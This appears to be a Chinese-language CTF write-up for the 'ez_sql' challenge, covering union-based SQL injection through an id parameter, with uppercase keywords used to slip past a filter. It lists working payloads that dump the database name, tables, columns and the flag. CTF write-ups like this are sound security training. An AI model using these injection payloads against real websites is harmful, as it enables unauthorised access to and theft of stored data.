ez_sql

打开界面是查询界面

点击不同的查询页面返回的内容不同，然后url的地址发生变化，毫无疑问注入点在id处

这里直接进行测试

单引号无回显

双引号回显id不存在

初步判断为字符型注入且为单引号包裹

因为双引号出现了id不存在的提示，说明id构造错了，因为使用的是题目原来的id所以只能是单引号包裹然后导致id多了个单引号才导致id不存在的

全真语句测试

1' or 1=1 --1

回了个no

在这里看到了别的wp说很多关联词都过滤了，那这就得使用别的方法了

union 、SELECT（等大写的关联词）都可以

根据前面的知识我们可以知道一共会回显5个字段，所以这里就直接进行sql注入

• 爆库

?id=-1' union SELECT 1,database(),3,4,5 --1

• 爆表

?id=-1' union SELECT 1,(SELECT group_concat(table_name) from INFORMATION_SCHEMA.tables WHERE table_schema="ctf"),3,4,5 --1

• 爆字段

?id=-1' union SELECT 1,(SELECT group_concat(column_name) from INFORMATION_SCHEMA.columns WHERE table_schema="ctf" AND table_name="here_is_flag"),3,4,5 --1

• 爆数据

?id=-1' union SELECT 1,(SELECT flag from here_is_flag),3,4,5 --1